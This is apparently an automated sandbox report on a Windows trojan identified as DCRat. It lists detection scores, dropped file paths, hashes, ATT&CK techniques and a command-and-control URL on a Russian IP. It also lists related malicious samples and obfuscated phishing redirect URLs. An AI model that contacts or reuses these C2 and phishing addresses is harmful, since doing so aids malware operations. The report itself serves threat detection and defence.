Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	135 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
KyC6hVwU8Z.exe	71%	ReversingLabs	Win32.Trojan.LummaC
KyC6hVwU8Z.exe	50%	Virustotal		Browse
KyC6hVwU8Z.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\dFZxqctW.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\luKnOVOf.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\oUNDhiUw.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\yTUtFuTG.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\oUNDhiUw.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\yTUtFuTG.log	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\Desktop\dFZxqctW.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\luKnOVOf.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oUNDhiUw.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\yTUtFuTG.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Resources\Ease of Access Themes\PfjsOcNiQfAmiszo.exe	74%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php	11%	Virustotal		Browse
http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php	100%	Avira URL Cloud	malware
http://185.43.5.93	0%	Avira URL Cloud	safe
http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptxye	0%	Avira URL Cloud	safe
http://185.43.5.93/5/4Datalife/asynccpu3Generator/	0%	Avira URL Cloud	safe
http://185.43.5.93	5%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
https://duckduckgo.com/chrome_newtab	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
https://duckduckgo.com/ac/?q=	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
http://185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.phptxye	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.43.5.93/5/4Datalife/asynccpu3Generator/	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
http://185.43.5.93	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000250C000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000257B000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmp	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
https://www.ecosia.org/newtab/	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	pPTyCqA3ru.exe, 0000000C.00000002.2818393278.0000000002933000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.00000000125B7000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000013313000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3306485908.0000000012560000.00000004.00000800.00020000.00000000.sdmp, ZFfbtcutmx.18.dr, W7PM2DQyUZ.18.dr, VEW9A1EszE.18.dr, VEAyO7Ny5R.18.dr, TvFZ4Odsaw.18.dr, ztZbyfXzHG.18.dr, g1RM1Cc1Yc.18.dr, 5GJpMsUiX7.18.dr, 4AJOvNjv94.18.dr, oW10my8Vk5.18.dr, Lvn0AwoiAY.18.dr, CwwFd3Elg2.18.dr, GqcwqXOahh.18.dr, 1ZeA5e2seG.18.dr, 8LXmt5osz2.18.dr, VmIEG1A40a.18.dr, hjoumFda20.18.dr, wTAdJq2utv.18.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.43.5.93	unknown	Russian Federation		29182	THEFIRST-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572160
Start date and time:	2024-12-10 07:30:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KyC6hVwU8Z.exe renamed because original name is a hash value
Original Sample Name:	a8c535490feb18fdff588d94c0d8a889.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/281@0/1
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 66% Number of executed functions: 25 Number of non-executed functions: 73
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 52.149.20.212, 20.190.177.23
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target KyC6hVwU8Z.exe, PID 652 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:33:13	API Interceptor	281x Sleep call for process: PfjsOcNiQfAmiszo.exe modified
01:33:29	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.43.5.93	2VaAObAYLP.exe	Get hash	malicious	DCRat	Browse	185.43.5.93/5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEFIRST-ASRU	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.246.67.73
	home.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	37.230.119.182
	x86-20241130-2047.elf	Get hash	malicious	Mirai	Browse	82.146.62.180
	sora.mips.elf	Get hash	malicious	Mirai	Browse	62.109.30.187
	UNFOT5F1qt.exe	Get hash	malicious	DCRat	Browse	188.120.228.203
	RustChecker.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	188.120.239.221
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==	Get hash	malicious	Unknown	Browse	78.24.219.84
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29t	Get hash	malicious	Unknown	Browse	78.24.219.84
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t	Get hash	malicious	Unknown	Browse	78.24.219.84
	exe009.exe	Get hash	malicious	Emotet	Browse	37.46.129.215

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe	2VaAObAYLP.exe	Get hash	malicious	DCRat	Browse
C:\Program Files\Reference Assemblies\Microsoft\Framework\PfjsOcNiQfAmiszo.exe	2VaAObAYLP.exe	Get hash	malicious	DCRat	Browse
C:\Program Files (x86)\Windows NT\Accessories\en-US\PfjsOcNiQfAmiszo.exe	2VaAObAYLP.exe	Get hash	malicious	DCRat	Browse

Process:	C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	691200
Entropy (8bit):	5.5554988350478975
Encrypted:	false
SSDEEP:	12288:C9X1yJ7/pZY7fiCI/YBfULiXPrQfkXmm1RhdLB9XFy+nM6D+:CVc7EaCQYBfcE1ZM6D+
MD5:	314420BAC969BCFB9510A0E8CC3686D6
SHA1:	66F1D0A60A2727970476A105C88883F37270E30F
SHA-256:	38B9CC3CCAE02C270E3D62E62E3B3B40E90AD7F898372B8A5035445BA32F4B26
SHA-512:	DEBF908ADD95AA0849451AEF830E5E71724247D352DCB5DAD6B02DCA0D54E4E915A9430DE80D970A4E7EF3749EB2FC7C6FA7839348D84F546D5934D713E7569C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: 2VaAObAYLP.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. ..............................R.....@.....................................S.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...d...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6572720812093972
Encrypted:	false
SSDEEP:	192:CbJXTKrFcD7Y0BU/nZajhzuiFRZ24IO8vKOC:O9HDfBU/AjhzuiFRY4IO8vG
MD5:	666A0B3CD7D2DFBBAC03171FE7B37DEB
SHA1:	80B894C8612403441A8329D537AE2842FD2466F7
SHA-256:	DBA856A99D9AB673631B800F0E74C85B5EC371962D3FF5E56D7360D278CD91B8
SHA-512:	DCEABD6684A74CF45D54AE095618377B10D4B5116479DFBA247B5D8C534C186CD7855D7355F33C2594690A1E08F243AB4A3A907169CE80972A2837BF04087D04
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.9.7.9.3.7.7.7.1.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.9.7.9.8.1.5.2.1.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.4.7.9.7.7.5.-.2.4.4.e.-.4.f.b.e.-.9.1.0.c.-.f.c.e.a.0.d.0.5.8.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.c.f.3.c.2.0.-.e.4.3.6.-.4.e.0.0.-.b.2.c.a.-.1.6.2.6.9.2.5.b.0.8.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.K.y.C.6.h.V.w.U.8.Z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.0.-.0.0.0.1.-.0.0.1.4.-.5.d.f.6.-.3.b.2.f.c.d.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.6.e.c.e.1.0.5.0.9.9.0.e.d.c.c.7.f.f.f.7.c.5.3.4.a.9.8.6.8.c.0.0.0.0.f.f.f.f.!.0.0.0.0.7.e.8.6.6.0.d.2.4.8.1.0.1.4.b.d.f.8.4.8.1.4.2.7.3.5.7.3.b.9.2.1.2.0.2.c.6.7.e.6.!.K.y.C.6.h.V.w.U.8.Z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

Process:	C:\Users\user\Desktop\KyC6hVwU8Z.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.181595394449682
Encrypted:	false
SSDEEP:	384:abquDyuX3PMD1A77ciNqC/Elsrl+0+/QlDIINvB0WLFW:gquuuHPMDinDY9al+0WQFNvBZ
MD5:	F3EDFF85DE5FD002692D54A04BCB1C09
SHA1:	4C844C5B0EE7CB230C9C28290D079143E00CB216
SHA-256:	CAF29650446DB3842E1C1E8E5E1BAFADAF90FC82C5C37B9E2C75A089B7476131
SHA-512:	531D920E2567F58E8169AFC786637C1A0F7B9B5C27B27B5F0EDDBFC3E00CECD7BEA597E34061D836647C5F8C7757F2FE02952A9793344E21B39DDD4BF7985F9D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@..:!o.:!o.:!o.3Y...!o..Jj.;!o..Jl.9!o..Jk.(!o.:!n.z!o..Jn.9!o..Jg.8!o..J..;!o..Jm.;!o.Rich:!o.........PE..d...h.6;.........."......"...*.......(.........@.....................................`....`.......... .......................................H...............p.................. ...`D..T............................@..............(A...............................text...0 .......".................. ..`.rdata..~....@.......&..............@..@.data........`.......<..............@....pdata.......p.......>..............@..@.rsrc................@..............@..@.reloc.. ............H..............@..B........................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.613979319612254
Encrypted:	false
